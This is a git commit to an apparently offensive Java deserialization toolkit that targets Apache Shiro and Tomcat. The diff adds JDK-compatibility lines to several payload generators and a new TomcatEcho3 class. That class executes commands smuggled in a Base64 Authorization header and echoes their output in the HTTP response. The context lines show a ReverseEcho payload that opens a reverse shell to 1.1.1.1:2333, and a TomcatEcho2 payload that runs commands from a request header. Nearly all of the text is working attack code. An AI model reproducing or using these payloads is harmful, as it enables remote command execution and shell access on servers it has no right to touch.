🐛 fix #37

SummerSec · SummerSec · commit d4f5dff89bc3 · 2023-07-02T06:24:38.000+08:00
diff --git a/src/main/java/com/summersec/attack/deser/echo/AllEcho.java b/src/main/java/com/summersec/attack/deser/echo/AllEcho.java
@@ -5,6 +5,8 @@
 import com.summersec.attack.deser.util.Gadgets;
 import javassist.*;
 
+import java.io.*;
+
 
 public class AllEcho implements EchoPayload {
 
@@ -101,14 +103,18 @@ public CtClass genPayload(ClassPool pool) throws Exception {
                 "        );}");
 
         clazz.addConstructor(CtNewConstructor.make("public dfs(){       r = null;        p = null;        h =new java.util.HashSet/*<Object>*/();        F(Thread.currentThread(),0);    }",clazz));
-
+        // 兼容低版本jdk
+        clazz.getClassFile().setMajorVersion(50);
 
         return clazz;
     }
 
     public static void main(String[] args) throws Exception {
 //        String echoOpt;
         Object template = Gadgets.createTemplatesImpl("AllEcho");
+
+
+
     }
 
 }
diff --git a/src/main/java/com/summersec/attack/deser/echo/DFSEcho.java b/src/main/java/com/summersec/attack/deser/echo/DFSEcho.java
@@ -0,0 +1,12 @@
+package com.summersec.attack.deser.echo;
+
+/**
+ * @ClassName: DFSEcho
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2023/4/29 0:49
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class DFSEcho {
+}
diff --git a/src/main/java/com/summersec/attack/deser/echo/ReverseEcho.java b/src/main/java/com/summersec/attack/deser/echo/ReverseEcho.java
@@ -26,6 +26,9 @@ public CtClass genPayload(ClassPool pool) throws NotFoundException, CannotCompil
         }
 
         clazz.addConstructor(CtNewConstructor.make("public ReverseEcho() throws Exception {\n        try {\n            String ip = \"1.1.1.1\";\n            String port = \"2333\";\n            String py_path = null;\n            String[] cmd;\n            if (!System.getProperty(\"os.name\").toLowerCase().contains(\"windows\")) {\n                String[] py_envs = new String[]{\"/bin/python\", \"/bin/python3\", \"/usr/bin/python\", \"/usr/bin/python3\", \"/usr/local/bin/python\", \"/usr/local/bin/python3\"};\n                for (int i = 0; i < py_envs.length; ++i) {\n                    String py = py_envs[i];\n                    if ((new java.io.File(py)).exists()) {\n                        py_path = py;\n                        break;\n                    }\n                }\n                if (py_path != null) {\n                    if ((new java.io.File(\"/bin/bash\")).exists()) {\n                        cmd = new String[]{py_path, \"-c\", \"import pty;pty.spawn(\\\"/bin/bash\\\")\"};\n                    } else {\n                        cmd = new String[]{py_path, \"-c\", \"import pty;pty.spawn(\\\"/bin/sh\\\")\"};\n                    }\n                } else {\n                    if ((new java.io.File(\"/bin/bash\")).exists()) {\n                        cmd = new String[]{\"/bin/bash\"};\n                    } else {\n                        cmd = new String[]{\"/bin/sh\"};\n                    }\n                }\n            } else {\n                cmd = new String[]{\"cmd.exe\"};\n            }\n            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();\n            java.net.Socket s = new java.net.Socket(ip, Integer.parseInt(port));\n            java.io.InputStream pi = p.getInputStream();\n            java.io.InputStream pe = p.getErrorStream();\n            java.io.InputStream si = s.getInputStream();\n            java.io.OutputStream po = p.getOutputStream();\n            java.io.OutputStream so = s.getOutputStream();\n            while (!s.isClosed()) {\n                while (pi.available() > 0) {\n                    so.write(pi.read());\n                }\n                while (pe.available() > 0) {\n                    so.write(pe.read());\n                }\n                while (si.available() > 0) {\n                    po.write(si.read());\n                }\n                so.flush();\n                po.flush();\n                Thread.sleep(50L);\n                try {\n                    p.exitValue();\n                    break;\n                } catch (Exception e) {\n                }\n            }\n            p.destroy();\n            s.close();\n        } catch (Throwable e) {\n            e.printStackTrace();\n        }\n    }", clazz));
+        // 兼容低版本jdk
+        clazz.getClassFile().setMajorVersion(50);
+
         return clazz;
     }
 }
diff --git a/src/main/java/com/summersec/attack/deser/echo/SpringEcho.java b/src/main/java/com/summersec/attack/deser/echo/SpringEcho.java
@@ -40,6 +40,9 @@ public CtClass genPayload(ClassPool pool) throws NotFoundException, CannotCompil
                 "                e.getStackTrace();\n" +
                 "            }\n" +
                 "        }", clazz));
+
+        // 兼容低版本jdk
+        clazz.getClassFile().setMajorVersion(50);
         return clazz;
     }
 }
diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java
@@ -103,6 +103,8 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
                 "        }\n" +
                 "    }",clazz));
 
+        // 兼容低版本jdk
+        clazz.getClassFile().setMajorVersion(50);
         return clazz;
     }
 }
diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
@@ -14,6 +14,8 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
         clazz.addMethod(CtMethod.make("    private static void writeBody(Object var0, byte[] var1) throws Exception {\n        byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n        Object var2;\n        Class var3;\n        try {\n            var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n            var2 = var3.newInstance();\n            var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n            var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n        } catch (ClassNotFoundException var5) {\n            var3 = Class.forName(\"java.nio.ByteBuffer\");\n            var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n            var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n        } catch (NoSuchMethodException var6) {\n            var3 = Class.forName(\"java.nio.ByteBuffer\");\n            var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n            var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n        }\n\n}", clazz));
         clazz.addMethod(CtMethod.make("    private static Object getFV(Object var0, String var1) throws Exception {\n        java.lang.reflect.Field var2 = null;\n        Class var3 = var0.getClass();\n\n        while(var3 != Object.class) {\n            try {\n                var2 = var3.getDeclaredField(var1);\n                break;\n            } catch (NoSuchFieldException var5) {\n                var3 = var3.getSuperclass();\n            }\n        }\n\n        if (var2 == null) {\n            throw new NoSuchFieldException(var1);\n        } else {\n            var2.setAccessible(true);\n            return var2.get(var0);\n        }\n    }", clazz));
         clazz.addConstructor(CtNewConstructor.make("    public TomcatEcho() throws Exception {\n        boolean var4 = false;\n        Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n\n        for (int var6 = 0; var6 < var5.length; ++var6) {\n            Thread var7 = var5[var6];\n            if (var7 != null) {\n                String var3 = var7.getName();\n                if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n                    Object var1 = getFV(var7, \"target\");\n                    if (var1 instanceof Runnable) {\n                        try {\n                            var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n                        } catch (Exception var13) {\n                            continue;\n                        }\n\n                        java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n\n                        for(int var10 = 0; var10 < var9.size(); ++var10) {\n                            Object var11 = var9.get(var10);\n                            var1 = getFV(var11, \"req\");\n                            Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n                            var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Ctmd\")});\n                            if (var3 != null && !var3.isEmpty()) {\n                                var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n                                var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"techo\"), var3});\n                                var4 = true;\n                            }\n\n                            var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"c\")});\n                            if (var3 != null && !var3.isEmpty()) {\n                                var3 = org.apache.shiro.codec.Base64.decodeToString(var3);\n                                var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n                                String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n                                writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n                                var4 = true;\n                            }\n\n                            if (var4) {\n                                break;\n                            }\n                        }\n\n                        if (var4) {\n                            break;\n                        }\n                    }\n                }\n            }\n        }\n}", clazz));
+        // 兼容低版本jdk
+        clazz.getClassFile().setMajorVersion(50);
         return clazz;
     }
 }
diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho3.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho3.java
@@ -0,0 +1,99 @@
+package com.summersec.attack.deser.echo;
+
+public class TomcatEcho3 {
+    public TomcatEcho3() throws Exception {
+        boolean var4 = false;
+        Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads");
+
+        for (int var6 = 0; var6 < var5.length; ++var6) {
+            Thread var7 = var5[var6];
+            if (var7 != null) {
+                String var3 = var7.getName();
+                if (!var3.contains("exec") && var3.contains("http")) {
+                    Object var1 = getFV(var7, "target");
+                    if (var1 instanceof Runnable) {
+                        try {
+                            var1 = getFV(getFV(getFV(var1, "this$0"), "handler"), "global");
+                        } catch (Exception var13) {
+                            continue;
+                        }
+
+                        java.util.List var9 = (java.util.List) getFV(var1, "processors");
+
+                        for(int var10 = 0; var10 < var9.size(); ++var10) {
+                            Object var11 = var9.get(var10);
+                            var1 = getFV(var11, "req");
+                            Object var2 = var1.getClass().getMethod("getResponse",new Class[0]).invoke(var1, new Object[0]);
+                            var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Host")});
+                            if (var3 != null && !var3.isEmpty()) {
+                                var2.getClass().getMethod("setStatus", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});
+                                var2.getClass().getMethod("addHeader", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String("Host"), var3});
+                                var4 = true;
+                            }
+
+                            var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Authorization")});
+                            if (var3 != null && !var3.isEmpty()) {
+                                var3 = decodeToString(var3.replaceAll("Basic ", ""));
+                                String[] var12 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var3} : new String[]{"/bin/sh", "-c", var3};
+                                writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter("\\A").next().getBytes());
+                                var4 = true;
+                            }
+
+                            if (var4) {
+                                break;
+                            }
+                        }
+
+                        if (var4) {
+                            break;
+                        }
+                    }
+                }
+            }
+        }
+    }
+    private static void writeBody(Object var0, byte[] var1) throws Exception {
+        byte[] bs = ("$$$" + encodeToString(var1) + "$$$").getBytes();
+        Object var2;
+        Class var3;
+        try {
+            var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+            var2 = var3.newInstance();
+            var3.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});
+            var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2});
+        } catch (Exception var5) {
+            var3 = Class.forName("java.nio.ByteBuffer");
+            var2 = var3.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});
+            var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2});
+        }
+    }
+
+    private static Object getFV(Object var0, String var1) throws Exception {
+
+        java.lang.reflect.Field var2 = null;
+        Class var3 = var0.getClass();
+
+        while(var3 != Object.class) {
+            try {
+                var2 = var3.getDeclaredField(var1);
+                break;
+            } catch (NoSuchFieldException var5) {
+                var3 = var3.getSuperclass();
+            }
+        }
+
+        if (var2 == null) {
+            throw new NoSuchFieldException(var1);
+        } else {
+            var2.setAccessible(true);
+            return var2.get(var0);
+        }
+    }
+    public static String encodeToString(byte[] rawBytes) {
+
+        return java.util.Base64.getEncoder().encodeToString(rawBytes);
+    }
+    public static String decodeToString(String base64) {
+        return  new String(java.util.Base64.getDecoder().decode(base64));
+    }
+}
diff --git a/src/main/java/com/summersec/attack/deser/util/Gadgets.java b/src/main/java/com/summersec/attack/deser/util/Gadgets.java
@@ -10,6 +10,7 @@
 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 
+import java.io.ByteArrayOutputStream;
 import java.io.File;
 import java.io.FileOutputStream;
 import java.lang.reflect.Array;

Original file line number	Diff line number	Diff line change
`@@ -26,6 +26,9 @@ public CtClass genPayload(ClassPool pool) throws NotFoundException, CannotCompil`
`26`	`26`	`}`
`27`	`27`
`28`	`28`	clazz.addConstructor(CtNewConstructor.make("public ReverseEcho() throws Exception {\n try {\n String ip = \"1.1.1.1\";\n String port = \"2333\";\n String py_path = null;\n String[] cmd;\n if (!System.getProperty(\"os.name\").toLowerCase().contains(\"windows\")) {\n String[] py_envs = new String[]{\"/bin/python\", \"/bin/python3\", \"/usr/bin/python\", \"/usr/bin/python3\", \"/usr/local/bin/python\", \"/usr/local/bin/python3\"};\n for (int i = 0; i < py_envs.length; ++i) {\n String py = py_envs[i];\n if ((new java.io.File(py)).exists()) {\n py_path = py;\n break;\n }\n }\n if (py_path != null) {\n if ((new java.io.File(\"/bin/bash\")).exists()) {\n cmd = new String[]{py_path, \"-c\", \"import pty;pty.spawn(\\\"/bin/bash\\\")\"};\n } else {\n cmd = new String[]{py_path, \"-c\", \"import pty;pty.spawn(\\\"/bin/sh\\\")\"};\n }\n } else {\n if ((new java.io.File(\"/bin/bash\")).exists()) {\n cmd = new String[]{\"/bin/bash\"};\n } else {\n cmd = new String[]{\"/bin/sh\"};\n }\n }\n } else {\n cmd = new String[]{\"cmd.exe\"};\n }\n Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();\n java.net.Socket s = new java.net.Socket(ip, Integer.parseInt(port));\n java.io.InputStream pi = p.getInputStream();\n java.io.InputStream pe = p.getErrorStream();\n java.io.InputStream si = s.getInputStream();\n java.io.OutputStream po = p.getOutputStream();\n java.io.OutputStream so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0) {\n so.write(pi.read());\n }\n while (pe.available() > 0) {\n so.write(pe.read());\n }\n while (si.available() > 0) {\n po.write(si.read());\n }\n so.flush();\n po.flush();\n Thread.sleep(50L);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {\n }\n }\n p.destroy();\n s.close();\n } catch (Throwable e) {\n e.printStackTrace();\n }\n }", clazz));
	`29`	`+ // 兼容低版本jdk`
	`30`	`+ clazz.getClassFile().setMajorVersion(50);`
	`31`	`+`
`29`	`32`	`return clazz;`
`30`	`33`	`}`
`31`	`34`	`}`
Original file line number	Diff line number	Diff line change
`@@ -40,6 +40,9 @@ public CtClass genPayload(ClassPool pool) throws NotFoundException, CannotCompil`
`40`	`40`	`" e.getStackTrace();\n" +`
`41`	`41`	`" }\n" +`
`42`	`42`	`" }", clazz));`
	`43`	`+`
	`44`	`+ // 兼容低版本jdk`
	`45`	`+ clazz.getClassFile().setMajorVersion(50);`
`43`	`46`	`return clazz;`
`44`	`47`	`}`
`45`	`48`	`}`
Original file line number	Diff line number	Diff line change
`@@ -103,6 +103,8 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N`
`103`	`103`	`" }\n" +`
`104`	`104`	`" }",clazz));`
`105`	`105`
	`106`	`+ // 兼容低版本jdk`
	`107`	`+ clazz.getClassFile().setMajorVersion(50);`
`106`	`108`	`return clazz;`
`107`	`109`	`}`
`108`	`110`	`}`
Original file line number	Diff line number	Diff line change
`@@ -14,6 +14,8 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N`
`14`	`14`	clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n Object var2;\n Class var3;\n try {\n var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n var2 = var3.newInstance();\n var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (ClassNotFoundException var5) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (NoSuchMethodException var6) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n }\n\n}", clazz));
`15`	`15`	clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n java.lang.reflect.Field var2 = null;\n Class var3 = var0.getClass();\n\n while(var3 != Object.class) {\n try {\n var2 = var3.getDeclaredField(var1);\n break;\n } catch (NoSuchFieldException var5) {\n var3 = var3.getSuperclass();\n }\n }\n\n if (var2 == null) {\n throw new NoSuchFieldException(var1);\n } else {\n var2.setAccessible(true);\n return var2.get(var0);\n }\n }", clazz));
`16`	`16`	clazz.addConstructor(CtNewConstructor.make(" public TomcatEcho() throws Exception {\n boolean var4 = false;\n Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n\n for (int var6 = 0; var6 < var5.length; ++var6) {\n Thread var7 = var5[var6];\n if (var7 != null) {\n String var3 = var7.getName();\n if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n Object var1 = getFV(var7, \"target\");\n if (var1 instanceof Runnable) {\n try {\n var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception var13) {\n continue;\n }\n\n java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n\n for(int var10 = 0; var10 < var9.size(); ++var10) {\n Object var11 = var9.get(var10);\n var1 = getFV(var11, \"req\");\n Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Ctmd\")});\n if (var3 != null && !var3.isEmpty()) {\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"techo\"), var3});\n var4 = true;\n }\n\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"c\")});\n if (var3 != null && !var3.isEmpty()) {\n var3 = org.apache.shiro.codec.Base64.decodeToString(var3);\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n var4 = true;\n }\n\n if (var4) {\n break;\n }\n }\n\n if (var4) {\n break;\n }\n }\n }\n }\n }\n}", clazz));
	`17`	`+ // 兼容低版本jdk`
	`18`	`+ clazz.getClassFile().setMajorVersion(50);`
`17`	`19`	`return clazz;`
`18`	`20`	`}`
`19`	`21`	`}`